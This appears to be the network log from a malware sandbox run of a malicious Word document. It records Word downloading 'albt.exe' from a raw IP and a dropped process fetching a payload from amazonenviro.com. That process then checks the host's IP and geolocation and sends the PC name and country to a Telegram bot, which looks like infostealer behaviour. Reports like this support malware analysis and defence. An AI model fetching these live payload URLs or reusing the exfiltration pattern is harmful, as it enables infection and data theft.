Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp0403391901.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1097591
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: v5XpZ+fRzsjv5Ca8ASfT3g==
Last-Modified: Wed, 29 Aug 2018 18:16:09 GMT
ETag: 0x8D60DDB7EAA50F0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e0e19fa5-101e-0021-5b88-10a43e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
GET

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

WINWORD.EXE

Remote address:

2.18.190.198:443

Request

GET /support/templates/en-us/tp0403392101.cab HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
X-IDCRL_ACCEPTED: t
X-Office-Version: 16.0.12527
X-Office-Application: 0
X-Office-Platform: Win32
X-Office-AudienceGroup: Production
X-Office-SessionId: 84940461-3435-42CA-9645-F14C82E8B6B6
Host: binaries.templates.cdn.office.net

Response

HTTP/1.1 200 OK

Content-Length: 1881952
Content-Type: application/vnd.ms-cab-compressed
Content-MD5: U8X0WyLhM7KNS9O1o1D9vQ==
Last-Modified: Wed, 29 Aug 2018 18:19:46 GMT
ETag: 0x8D60DDC0007D57D
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 13376a1c-b01e-003d-2ee2-e48d4f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Tue, 14 Jan 2025 07:07:24 GMT
Connection: keep-alive
Access-Control-Allow-Headers: *
Vary: Origin
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Origin: *
DNS

159.165.48.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

159.165.48.23.in-addr.arpa

IN PTR

Response

159.165.48.23.in-addr.arpa

IN PTR

a23-48-165-159deploystaticakamaitechnologiescom
DNS

198.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.190.18.2.in-addr.arpa

IN PTR

Response

198.190.18.2.in-addr.arpa

IN PTR

a2-18-190-198deploystaticakamaitechnologiescom
DNS

198.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.190.18.2.in-addr.arpa

IN PTR
DNS

amazonenviro.com

brightness.exe

Remote address:

8.8.8.8:53

Request

amazonenviro.com

IN A

Response

amazonenviro.com

IN A

166.62.27.188
GET

https://amazonenviro.com/admin/245_Nsltarpncon

brightness.exe

Remote address:

166.62.27.188:443

Request

GET /admin/245_Nsltarpncon HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: amazonenviro.com

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:29 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Fri, 10 Jan 2025 16:03:39 GMT
ETag: "2ca4707-bf154-62b5c3ce70cd3"
Accept-Ranges: bytes
Content-Length: 782676
Vary: Accept-Encoding
Keep-Alive: timeout=5
DNS

188.27.62.166.in-addr.arpa

Remote address:

8.8.8.8:53

Request

188.27.62.166.in-addr.arpa

IN PTR

Response

188.27.62.166.in-addr.arpa

IN PTR

1882762166hostsecureservernet
DNS

200.163.202.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

200.163.202.172.in-addr.arpa

IN PTR

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

92.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

92.12.20.2.in-addr.arpa

IN PTR

Response

92.12.20.2.in-addr.arpa

IN PTR

a2-20-12-92deploystaticakamaitechnologiescom
DNS

checkip.dyndns.org

npratlsN.pif

Remote address:

8.8.8.8:53

Request

checkip.dyndns.org

IN A

Response

checkip.dyndns.org

IN CNAME

checkip.dyndns.com

checkip.dyndns.com

IN A

193.122.6.168

checkip.dyndns.com

IN A

132.226.247.73

checkip.dyndns.com

IN A

193.122.130.0

checkip.dyndns.com

IN A

158.101.44.242

checkip.dyndns.com

IN A

132.226.8.169
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
GET

http://checkip.dyndns.org/

npratlsN.pif

Remote address:

193.122.6.168:80

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
DNS

reallyfreegeoip.org

npratlsN.pif

Remote address:

8.8.8.8:53

Request

reallyfreegeoip.org

IN A

Response

reallyfreegeoip.org

IN A

104.21.16.1

reallyfreegeoip.org

IN A

104.21.32.1

reallyfreegeoip.org

IN A

104.21.64.1

reallyfreegeoip.org

IN A

104.21.112.1

reallyfreegeoip.org

IN A

104.21.48.1

reallyfreegeoip.org

IN A

104.21.96.1

reallyfreegeoip.org

IN A

104.21.80.1
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325925
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hHpCJ%2Be9diR%2FKrSOxO%2F71%2FkhkC%2BcgZ%2F0InueJo28ZEXxu4X6eRu61wGbyEnDFqZUAVYSfo4ZiabimYLqFzlVO1hxqrsv8shsCd6PJ%2F8zj%2BEu3%2FKm8icEQK99qF1YyII7GX4qSIHi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa08d15ecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=30440&min_rtt=26113&rtt_var=13739&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3009&recv_bytes=390&delivery_rate=125834&cwnd=253&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=105&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325925
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U9EkhxVlFoaqk9mwOSod%2BUBYTr5AxsSSP78Y90KmLZyH7nh2H4eEIywMMZf7eVUud%2BUY53ypLVZ6n%2BuIw6HCrhIGiB4JOXlZivQ6xxJAQTDLhZHJuMiPxCI82ifR2qK6RM0Hcni3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa12df6ecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=36050&min_rtt=26113&rtt_var=21526&sent=6&recv=7&lost=0&retrans=0&sent_bytes=4291&recv_bytes=482&delivery_rate=125834&cwnd=254&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=190&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:51 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325925
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QkjLFqDcPx2e1maaW6mOB%2FNdVZSJDo35H1trU2TubZD5bTU4mHHYgSmCj%2FRtHN5syDTLuOtcPrUeZG0RhZHSBWctTbty5wtIdW4E%2B%2BJ5V6k53lXHh1%2B5IewMGA6oCu338e%2BEVECb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa19ec2ecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=40352&min_rtt=26113&rtt_var=24747&sent=7&recv=8&lost=0&retrans=0&sent_bytes=5561&recv_bytes=574&delivery_rate=125834&cwnd=255&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=270&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325926
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OsYPXMlvm5za%2F%2Fj89TdbZyuPz9rel8Eha3%2Fj0XibDKVlCsE%2FHpb5t3OD54ECQ25scPdr%2Fld1t2oWHvuXniQhAJFb3EVSgJrWpAK8n16u6UO9cvbWCAkYFFcAWt7C7mOP%2BP6ph%2Br"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa22f80ecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=44179&min_rtt=26113&rtt_var=26215&sent=8&recv=9&lost=0&retrans=0&sent_bytes=6837&recv_bytes=666&delivery_rate=125834&cwnd=256&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=351&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325926
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UohCQ8Wa%2Fg5KN0FDCJy4lGtCfKaHN%2BIjzDeWDiC1pLij8l2cyIXiI6JNTKRbpvt%2Be5V4XkBQp9YxPxawDqVIrIT72MgPfy5W7nDOzLmLfjN10Ge1GxBOTFPvwqvWvTu7NEWu%2F%2BOA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa2a88decff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48200&min_rtt=26113&rtt_var=27704&sent=9&recv=10&lost=0&retrans=0&sent_bytes=8115&recv_bytes=758&delivery_rate=125834&cwnd=257&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=436&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325926
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b8e5z907SBeorR1ybkSz7wbNIagh%2FWw%2BdDTJncZ9GIUG3wG0JTJfol4IxQKHaaiDQdbrf%2BvM7iRLmTYDSOZVT%2Fpjz2PK8%2FSPOQL%2BbxWpSIwGN2sT4YwbHMvlD4ognE2m0jMXIybD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa3294aecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=51270&min_rtt=26113&rtt_var=26917&sent=10&recv=11&lost=0&retrans=0&sent_bytes=9390&recv_bytes=850&delivery_rate=125834&cwnd=257&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=516&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325926
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjREGFukeBLxeUUp0yclL6cptftw9I5Fs%2FJB2VzKc%2B60yF0oHdI4h3LXyHXs2HtV7L5XAUpgv8CtY7r0KJpdBrIuQMkKdnDE5ELfPpFA%2F6ZBcW1h0v8l6CRQyO6CBLa4lC2I134%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa3aa4eecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53960&min_rtt=26113&rtt_var=25567&sent=11&recv=12&lost=0&retrans=0&sent_bytes=10668&recv_bytes=942&delivery_rate=125834&cwnd=257&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=597&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325926
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fr920syGm%2FDh94Le66ex6ioVIHWf1isHbF%2FawQtwjMXyHXjGZLJI80x%2BFgqXL46FQ8HaGTvyqhuiX49p%2FCDU%2FLAanv1Rll2wb%2FjD3IwM%2F7MsKMkR6r0wA5eZkRFsop7OHnqDv6Gk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa42b2becff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=56287&min_rtt=26113&rtt_var=23830&sent=12&recv=13&lost=0&retrans=0&sent_bytes=11943&recv_bytes=1034&delivery_rate=125834&cwnd=257&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=681&x=0"
GET

https://reallyfreegeoip.org/xml/181.215.176.83

npratlsN.pif

Remote address:

104.21.16.1:443

Request

GET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org

Response

HTTP/1.1 200 OK

Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 5325926
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFJZ2fFMATDvM2w5M7KJ4y1IcuO0FenIzR5DDPGPWJzb2wjnAkWLfUHxGD5dJNGPyvJDsxxXLMWHsPee5F%2B26nOOIyttYaU7%2F98qmb06fX5XIY6FgWCFccIeaiHB8WYo7dcj5LhW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901bcaa4bbf0ecff-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=58365&min_rtt=26113&rtt_var=22028&sent=13&recv=14&lost=0&retrans=0&sent_bytes=13227&recv_bytes=1126&delivery_rate=125834&cwnd=257&unsent_bytes=0&cid=0c13d9e2dfcc8b30&ts=762&x=0"
DNS

168.6.122.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.6.122.193.in-addr.arpa

IN PTR

Response
DNS

api.telegram.org

npratlsN.pif

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:HGNBWBGW%0D%0ADate%20and%20Time:%201/14/2025%20/%207:07:51%20AM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20HGNBWBGW%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

npratlsN.pif

Remote address:

149.154.167.220:443

Request

GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:HGNBWBGW%0D%0ADate%20and%20Time:%201/14/2025%20/%207:07:51%20AM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20HGNBWBGW%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Server: nginx/1.18.0
Date: Tue, 14 Jan 2025 07:07:52 GMT
Content-Type: application/json
Content-Length: 55
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

1.16.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.16.21.104.in-addr.arpa

IN PTR

Response
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
DNS

mail.irco.com.sa

npratlsN.pif

Remote address:

8.8.8.8:53

Request

mail.irco.com.sa

IN A

Response

mail.irco.com.sa

IN A

46.151.208.21
DNS

21.208.151.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.208.151.46.in-addr.arpa

IN PTR

Response

21.208.151.46.in-addr.arpa

IN PTR

host ibtikaratnet
DNS

134.130.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

134.130.81.91.in-addr.arpa

IN PTR

Response
DNS

31.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.243.111.52.in-addr.arpa

IN PTR

Response
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

234.17.178.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.17.178.52.in-addr.arpa

IN PTR

Response

147.124.216.113:80

http://147.124.216.113/albt.exe

http

WINWORD.EXE

27.0kB
1.5MB
576
1081

HTTP Request

GET http://147.124.216.113/albt.exe

HTTP Response

200
52.109.89.19:443

https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

tls, http

WINWORD.EXE

1.8kB
8.3kB
12
11

HTTP Request

POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

HTTP Response

200
23.48.165.159:443

https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

tls, http

WINWORD.EXE

1.3kB
6.0kB
10
11

HTTP Request

GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

tls, http

WINWORD.EXE

2.9kB
54.0kB
39
45

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

tls, http

WINWORD.EXE

1.6kB
26.2kB
17
25

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

tls, http

WINWORD.EXE

1.7kB
28.0kB
19
27

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

tls, http

WINWORD.EXE

2.2kB
39.1kB
29
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

tls, http

WINWORD.EXE

1.8kB
41.0kB
23
36

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

tls, http

WINWORD.EXE

1.8kB
39.8kB
22
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

tls, http

WINWORD.EXE

2.3kB
37.5kB
29
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

tls, http

WINWORD.EXE

67.5kB
2.6MB
1233
1902

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

HTTP Response

200

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

tls, http

WINWORD.EXE

2.1kB
37.9kB
27
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

tls, http

WINWORD.EXE

2.5kB
40.1kB
33
35

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

tls, http

WINWORD.EXE

2.4kB
39.0kB
32
34

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

tls, http

WINWORD.EXE

2.0kB
37.0kB
25
33

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

tls, http

WINWORD.EXE

13.4kB
322.2kB
208
237

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

tls, http

WINWORD.EXE

2.0kB
37.5kB
26
32

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

HTTP Response

200
2.18.190.198:443

https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

tls, http

WINWORD.EXE

24.3kB
751.4kB
403
544

HTTP Request

GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

HTTP Response

200
2.18.190.198:443

